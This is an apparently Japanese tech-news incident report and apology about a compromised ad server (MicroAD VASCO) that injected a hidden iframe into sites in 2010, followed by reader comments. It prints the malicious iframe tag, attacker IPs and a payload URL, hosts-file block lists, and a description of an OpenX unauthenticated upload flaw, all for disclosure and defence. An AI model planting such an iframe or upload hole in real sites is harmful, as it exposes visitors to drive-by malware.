ADサーバー掲出タグによるセキュリティアラートと対処について 83
報告とお詫び 部門より
ADサーバー担当者 曰く、
今回は大変ご迷惑をおかけしまして申し訳ありませんでした。
OSDNのサイトでは、広告バナーの配信のためのADサーバーとして、MicroAD社のVASCOを使っておりましたが、 本来掲出されるはずの広告タグの前に不明なiframeタグ差し込まれるという事態が発生し、その中身によって不明なサイトに誘導されるということが起きてしまいました。
原因がVASCO ADサーバーによるものだと特定でき、OSDN管理のADサーバーに切り替えたのは24日23:30です。その後、キャッシュなどに残っていないか確認作業を進め、25日0:29にOSDN全サイトで問題ないことを確認いたしました。
具体的な現象としては、vsc.send.microad.jpのJavaScriptから掲出されるタグにおいて、<iframe width="1" height="1" src="http://xxxx.ipq.co/statsm?ref=jp"></iframe>
xxxxはversus
のタグが差し込まれ、ここからセキュリティ上警告を受けるサイトに誘導されるというものです。
現在も引き続き原因・詳細を調査中ではありますが、状況説明ならびに対処が終わった旨をご報告する次第です。
なお、問題が発生したADサーバーサービスについては、特段の状況の変化がない限り、OSDNでは今後利用することはありません。
改めまして大変ご迷惑をおかけしましたことをお詫びいたします。
追記・修正:2:12)
Googleのアップデートで「.redmancerg.net」を検索のつぶやきなどでも確認できるように、影響の範囲はVASCOを採用している各サイトの広範囲に及んでいるようです。gigazine.net、impress.co.jpほか、7netshopping.jp、mainichi.jpなど未対処と思われるサイトもあるので注意してください。
現在(2:12時点)は差し込みはなくなったようですが、時限式の可能性もあります。
初出時、挿入されたiframeのsrc部分をブランクとしましたが、明記に変更しました。こちらをブロックしておいていただければひとまずの対処になるものと思われます。
修正:2:46)
コメントでのご指摘のように「原因がVASCO ADサーバーによるものだと」に書き換えました。
修正:3:44)
RSSリーダーなどでsrc部分がリンクに書き換えられてしまう場合がありましたので、
分離記述にしました。
追記
MicroAD社から5:32に問題の核となる箇所は回復した旨の連絡を受けていますので、現在は大丈夫と思われます。
追記)
AdobeソフトウェアのアップデートやWindows Updateを怠っていたWindows環境でアクセスした方は、念のためウイルス対策ソフトにて確認をお願いします。該当の問題から、アラートが機能しないブラウザでアクセスした場合は、次にPDFなどの脆弱性を試すコードが実行され、それに成功した場合は、Security Toolというマルウエアがインストールされるようです。
配信可能性のある時間帯は、弊社が確認できている範囲ですと、
OSDNサイト:24日21:00~24日23:30
他社サイト:24日21:00~25日午前1:30
です。
この時間帯に脆弱性があるWindows環境でサイトアクセスした可能性のある方は確認をお願いいたします。
追記 21:48)
MicroAD社から報告が届きました。それによると今回の問題は、
9/24 20:30~9/25 0:00 断続的に弊社サーバーに対し外部(海外)から複数 回の不正アクセスの履歴を確認
→このタイミングのいずれかで不正なリンクが挿入されるプログラムが混入され たものと想定しております。
9/25 00:30 弊社システム担当による不正箇所の調査、不具合の原因特定作業を 実施。
9/25 01:10 障害発生の直接の原因となる広告配信タグ内の不正コードを削除し 動作復旧を確認。
根本の原因となったプログラムの脆弱性箇所を特定し、該当プログラムの削除、 改善を実施。
とのことですので1:30ごろには終息していたものと思われます。
90氏が日記にまとめられていますので併せてご参照ください。
追記:27日12:24)
MicroAD社が対応窓口を設置しました。また報告文書が公開されています。
03-5459-6344
user-support@microad.jp
【障害報告】弊社サービスの改ざんに関するお詫びと報告
OpenXの脆弱性 (スコア:5, 参考になる)
記事で書かれているOpenXの脆弱性は、ビデオプラグインに関するもので、ofc_upload_image.phpというコードが、ユーザ認証もなしで、実行可能スクリプトもサーバー上に保存できるというもののようです。対応としては、admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php のファイルを消すだけということですので非常に簡単なように見えますが、実行可能スクリプトを好きにuploadできるということは、既に脆弱性を突かれた大元の広告サーバーについては、該当ファイルを消したとしても他のサーバー内のファイルは信用できないということになります。もしこの脆弱性が突かれていたとしたら、MicroAD社のサービスを切り離すのは正解でしょう。
また、今回の問題がこの脆弱性に起因するものでなかったとしても、この脆弱性が残るOpenXを使用しているサイトには同じ騒動を起こさせることが可能かと思いますので、広告関連の業界の方はチェックが必要でしょう。
Hauncon
Re:OpenXの脆弱性 (スコア:1, 興味深い)
気になるのは、以前はVASCOを使っていたのかということ。
つまり、以前はVASCOと共に併用していて、今回VASCOを外した結果なのか、それとも以前からVASCOは使っておらず、MicroADとは別のOpenXを使ったシステムで、MicroADと同じ攻撃を受けた結果だったのか、と言う所。
確たる情報もなく、憶測でしかありませんが、概ね同じ頃に影響を受け、比較的短時間で復旧しているっぽいので、前者なかと思っていました。
しかし、事が起こる前の事は確認のしようがないし、中の人じゃないと実際の所は分からないと。
そういえばWeb魚拓ってありましたね。
ギガジンのは残ってないのですが、ライフハッカーの方はありました。
http://megalodon.jp/2010-0718-1818-42/www.lifehacker.jp/2010/07/100716virutalbox.html
#事件の後ですし閲覧はご注意を。
このソースを見るかぎりVASCOを使用しているような所はありません。
もしかして後者だったのでしょうか?
#実際は自社広告システムで各社のサービスに振り分けているだけかもしれませんが。
※以上については過分に憶測が入ってます。
GIGAZINE (スコア:1)
GIGAZINE は VASCO を使っていたようです。
http://gigazine.net/index.php?/news/comments/20100927_security_tool/ [gigazine.net]
ipq.co ってドメインへの登録サービスらしい (スコア:4, 参考になる)
素性を調べた所、ipq.coは任意のIPアドレスを、xxx.ipq.co(xxxはランダムに生成される文字列)というFQDNでDNSに登録するサービスのようです。
→作者のブログ(英語) [johnleach.co.uk]、Googleのセーフブラウジング診断ページ [google.com]
安直なサービスなので、フィッシングサイトも利用してしまった模様。
0.0.0.0 (スコア:4, 参考になる)
以前からGoogle Analyticsと同じように [srad.jp]
0.0.0.0 vasco.send.microad.jp
0.0.0.0 vsc.send.microad.jp
0.0.0.0 associate.microad.jp
0.0.0.0 cache.microad.jp
みたいなの書いてた自分勝利?
この他、トラッキングとか広告、カウンターのためだけのホストは
手当たり次第にhostsに0.0.0.0登録しています。
Re:0.0.0.0 (スコア:2, 参考になる)
0.0.0.0 spynettest.microsoft.com
0.0.0.0 spynet2.microsoft.com
0.0.0.0 trafficcdn.liveuniversenetwork.com
0.0.0.0 bannerfarm.ace.advertising.com
0.0.0.0 ad-apac.doubleclick.net
0.0.0.0 feedads.g.doubleclick.net
0.0.0.0 ad.hatena.ne.jp
0.0.0.0 pagead2.googlesyndication.com
0.0.0.0 www.google-analytics.com
0.0.0.0 ecx.images-amazon.com
0.0.0.0 img.adplan-ds.com
0.0.0.0 ah.yimg.jp
#Web広告?なにそれおいしいの?
Re:0.0.0.0 (スコア:1, 参考になる)
上の広告のIP、Adsリスト [anonym.to]に載ってる。
hostsにワイルドカード (スコア:1)
hostsにワイルドカードを使用できるようになるのはいつですか。
#絶対需要高いと思うんだが何故対応してくれないんだろう
Re:hostsにワイルドカード (スコア:1)
PDFファイル (スコア:2, 参考になる)
ログが表示されキャンセルできたのですが、ipq.coのPDFファイル
を自動的に開こうとする状況になっていたようです。
メモは取っていないのですが、PDFファイル名はランダムっぽい
英数字となっていました。
PDFファイルを使ってAdobe Reader経由で何かしようとした可能
性もあるので、ブラウザ内で表示したりAdobe Readerで開いてしま
ったりした場合は注意したほうがいいかもしれません。
Re:PDFファイル (スコア:2, 興味深い)
私の環境では,メディアプレイヤーが起動しました。
すぐに閉じたので,その後の挙動は不明ですが。
Re:PDFファイル (スコア:1, 参考になる)
すぐに終了させたので詳細は不明です。
Re:PDFファイル (スコア:1)
私のChromeでもVLCが起動してました。
で、どうやら「hcp.ram」ってファイルを勝手に開こうとしてたみたいです。
(ウィンドウ最下部のダウンロード済ファイルに表示されていた)
このramファイルの中身を確認したところ「http://79.142.65.245/inc/tmp/hcp.smil」となってました。
タイムスタンプによると23:08の出来事らしい。
あと、何かのプラグインを入れてもいいかってメッセージがページ上部に表示されていてました。
具体的に何を入れようとしているのかという情報を調べる方法はよく分からなかったので、そっから先はわかりません。
そういえば開いてた (スコア:0)
あれ、リモートから起動されてたのか。怖いな
Re:PDFファイル (スコア:1, 興味深い)
あわてて閉じたら、次に、Javaマーク入りの何か起動して、Security Toolとかいうマルウェア?が起動しました。
おかげでWindowsをクリーンインストールすることが出来ました。
#ウィルスセキュリティZERO入れてるんだけど、役立たずだった・・・
Re: (スコア:0)
記憶頼りで正確な日時が言えないのでアレなんですが。
Opera使ってて誤って必要ないマウスジェスチャーをした(ページ先送りかな?)時、ダウンロードするダイアログが出てきて「何これ?」と思いつつキャンセルしてた事がありました。
何処からのどんなファイルだったかは同じくメモを取って無い(Operaにはメモがあるのにねw)のでよく分かりません。
で、この現象は少なくとも24日以前からもたびたび起きていました。
#今思えば「なんだーそーだったのかー?」状態
サードパーティのコンテンツの安全性 (スコア:2)
現在のWebサイトには、見たい目的のコンテンツがある本家以外に
ターゲティング広告やトラッキングのためのサードパーティコンテンツが
色々埋め込まれているので、本家だけのセキュリティ措置では
サイト丸ごとでの安全性を保証できなくなってきてますね。
特に広告は、何が送られてくるか事前に確定できないので
こういう事例が発生しやすいんじゃないかと思います。
#広告サービスを掲載する際にセキュリティ診断審査とかしてないのかな?
で、今はブラウザでは「サードパーティのCookieの保存」の可否が選択できますが
これをもっと進めて「サードパーティコンテンツの表示」も
選択できるようにしてくれないかなあ、なんて思ったりします。
--------------------
/* SHADOWFIRE */
Re:サードパーティのコンテンツの安全性 (スコア:1, 参考になる)
無断リンク禁止とか、他所様の画像を直にIMGタグで使うなとか、そういう流儀が広まってるし。
IEのInPrivateフィルタ (スコア:2, 参考になる)
毎日.jpも (スコア:2, 参考になる)
他のサイト (スコア:1)
Re:他のサイト (スコア:2, 参考になる)
増田で他サイト状況がまとまってますね。消えるのが早い印象があるので、現象を確認できていないサイト運営社もあるのではないでしょうか。
ほかサイトの対応は。。。 (スコア:1, 参考になる)
Re:ほかサイトの対応は。。。 (スコア:2)
http://www.microad.jp/press/20100823/ [microad.jp]
によると、50社以上のサイトに影響。
Re:ほかサイトの対応は。。。 (スコア:2, おもしろおかしい)
PDFの脆弱性も利用する攻撃に関するプレスリリースがPDFファイル。
何かの冗談ですか。
Re: (スコア:0)
げ、ここってさくらんぼ小学校で一躍有名になった「セキュリティ会社」の子会社じゃないですか。
#それだけなのでAC
で、MicroADの発表マダ? (スコア:1, すばらしい洞察)
被害を受けるのは閲覧したユーザーだということがわかっているなら、お詫び広告が入るはずだ。
#MicroADで?
Re:で、MicroADの発表マダ? (スコア:2, おもしろおかしい)
自分でツッコむのもなんだけど、MicroADて行動ターゲッティング広告をウリにしているんだから的確にお詫び広告出せたらすばらしい技術と称える………かな?
で、「セキュリティ上問題になる広告を出しても一切責任を取らない」という契約になっていないなら、広告掲載サイトは対応の損害賠償請求するべきなんじゃないかなぁ?
………広告内容に関してMicroADは責任を取らないって一文がありそうだな(´・ω・`)
Re:で、MicroADの発表マダ? (スコア:1)
パナソニックのCMみたいになるのかな...
まあ、それはそれとして、各位御苦労さまでした。
M-FalconSky (暑いか寒い)
ADサーバ…ActiveDirectoryかとおもったぢゃないかw (スコア:1, 参考になる)
確かにAD(=広告)だけどさ・・・技術系サイトだとActiveDirectoryを連想するじゃないか。
# アンチMSではないはずだが・・・全く面白くないのでAC。
impressもmicroadを使っていたようで (スコア:1)
お詫びが出てた
http://www.watch.impress.co.jp/headline/docs/notice/20100926_396275.html [impress.co.jp]
ちなみにmicroadのお詫び
http://www.microad.jp/press/20100925/20100925.pdf [microad.jp]
おつかれさまです。 (スコア:0)
正確なものは後からで構いませんが。
Re:おつかれさまです。 (スコア:1)
別なサイトですが,21:20過ぎににアラートがでました。
同じ広告サービスかは判りませんが,攻撃用ファイル名はスラドと同一でした。
スラドに関しては,21:45-22:00の間にコメントを書いた直後,アラートがでました。
#ACで書いたので,詳細な時間は秘密。
Re: (スコア:0)
自分のツイッターのログによれば、10:01PMにはアラートが出ていました。
Re:おつかれさまです。 (スコア:2)
私の環境ではNorton Internet Security 2009で「進入の試みを遮断しました」という報告があがりました。
22:13です。攻撃者URLは記事にあるのと同じドメイン(77.78.240.154:80)でした。
人生は七転び八起き、一日は早寝早起き
でた (スコア:0)
どう考えても突っ込まれますよね。
原因は何ですか。
Re:でた (スコア:1)
iframeオフ (スコア:0)
by Opera
javascriptオフ (スコア:0)
Re:javascriptオフ (スコア:1)
# 時々おもしろいネタ広告があると評判のときはOperaでもSafariでもIEでも起動すればいいし。Google Chromeには広告ブロック用拡張を導入したっけ。
Re: (スコア:0)
Re:javascriptオフ (スコア:2, 参考になる)
NoScriptは操作がいちいちわずらわしすぎるので通常disableにしてます。
Adblock Plusに加えてjbeef先生イチオシのRequest Policyを使っている。
さらにRemove It Permanentlyというものも使ったり使わなかったり <-- 天気予報サイトなどではとっても便利。
広告屋あがったりというクレームは無視の方向で。
もういいよ、Adblock入れたから (スコア:0)
adblock入れただけじゃ駄目だった気がする (スコア:1)
リストに「*.microad.jp/*」とか入れないと
はじめクッキー見たときマイクロードって何だ?と思った
Re: (スコア:0)
Re: (スコア:0)
広告はブロックしつつコメントを楽しむだけ。
しかも普段休日は殆ど更新しないくせに、今日はこのエントリを押し流すように沢山更新してるし。
Re:もういいよ、Adblock入れたから (スコア:1, 興味深い)
先週末から休日掲載が増えてますね。
読者層アンケートで職場で見る人が多いから土日更新を控えてるのかなと思ってましたが、
少ないとはいえ土日もコメントがつくのでそれなりに読者はいるようです。
Re:もういいよ、Adblock入れたから (スコア:1)
まぁ、故意かどうかはともかく、このストーリーがしばらくトップに出るような対応が可能なら、そうするべきですね。
別に他のストーリー掲載してもいいから。
#slashcode的にできないんだっけ?
関連ストーリー (スコア:0)
mixiアプリを提供していたサーバーが改竄被害、サービス停止に [srad.jp]
これなんかも関連じゃないでしょうかね
起きてる(起きた)問題点は似たようなものだし
この記事トップにもっていけないの? (スコア:0)
下にあってさっきまで気がつかなかったよ